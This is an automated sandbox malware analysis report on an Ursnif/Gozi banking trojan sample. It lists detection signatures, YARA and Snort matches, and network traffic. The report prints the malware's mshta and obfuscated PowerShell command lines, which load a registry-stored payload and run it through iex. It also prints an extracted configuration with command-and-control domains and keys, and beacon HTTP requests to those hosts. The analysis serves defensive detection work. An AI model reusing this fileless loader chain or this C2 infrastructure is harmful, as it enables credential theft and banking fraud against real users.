Windows Analysis Report
main.exe

Overview

General Information

Sample Name: main.exe
Analysis ID: 747122
MD5: 9676298f24c8cdd4b532ac027a00f60e
SHA1: 8d0bd57712533f1a889627706925c17ed4347ce5
SHA256: 0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
Tags: exe

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • main.exe (PID: 6012 cmdline: C:\Users\user\Desktop\main.exe MD5: 9676298F24C8CDD4B532AC027A00F60E)
  • mshta.exe (PID: 2388 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown |
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown |
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
(38 additional entries not shown)

Source | Rule | Description | Author | Strings
0.2.main.exe.6d0000.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.main.exe.cb94a0.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.3.main.exe.14294a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.3.main.exe.1455948.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.3.main.exe.13aa4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(3 additional entries not shown)
No Sigma rule has matched

Snort IDS alerts:

Timestamp: 11/16/22-02:14:48.026105
Source IP: 192.168.2.3
Destination IP: 134.0.118.203
Source Port: 49698
Destination Port: 80
SID: 2033203
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/16/22-02:14:48.026105
Source IP: 192.168.2.3
Destination IP: 134.0.118.203
Source Port: 49698
Destination Port: 80
SID: 2033204
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: main.exe | Virustotal: Detection: 61%
Source: main.exe | Avira: detected
Source: main.exe | Joe Sandbox ML: detected
Source: 0.2.main.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.0.main.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: main.exe | Malware Configuration Extractor: Ursnif {"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: main.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49698 -> 134.0.118.203:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49698 -> 134.0.118.203:80
Source: Joe Sandbox View | ASN Name: AS-REGRU AS-REGRU
Source: global traffic | HTTP traffic detected:
  GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: powershell.exe, 0000000F.00000002.527605554.00000265C03F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | DNS traffic detected: queries for: lentaphoto.at
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
Source: Yara match | File source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: main.exe, 00000000.00000002.505909636.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                System Summary

                barindex
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: main.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
